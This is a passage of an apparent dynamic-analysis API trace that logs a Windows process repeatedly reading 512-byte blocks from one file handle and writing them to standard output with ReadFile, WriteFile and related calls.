lpOverlapped=0x0) returned 1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.853] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.853] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.854] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.854] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.856] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.856] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] GetFileType (hFile=0x50) returned 0x1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] GetFileType (hFile=0x50) returned 0x1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.857] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.857] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] GetFileType (hFile=0x50) returned 0x1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] GetFileType (hFile=0x50) returned 0x1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] GetFileType (hFile=0x50) returned 0x1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] GetFileType (hFile=0x50) returned 0x1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] GetFileType (hFile=0x50) returned 0x1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] GetFileType (hFile=0x50) returned 0x1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] GetFileType (hFile=0x50) returned 0x1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] GetFileType (hFile=0x50) returned 0x1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.858] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.858] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] GetFileType (hFile=0x50) returned 0x1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.860] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.860] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] GetFileType (hFile=0x50) returned 0x1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] GetFileType (hFile=0x50) returned 0x1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] GetFileType (hFile=0x50) returned 0x1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] GetFileType (hFile=0x50) returned 0x1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] GetFileType (hFile=0x50) returned 0x1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] GetFileType (hFile=0x50) returned 0x1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] GetFileType (hFile=0x50) returned 0x1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] GetFileType (hFile=0x50) returned 0x1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.861] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.861] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] 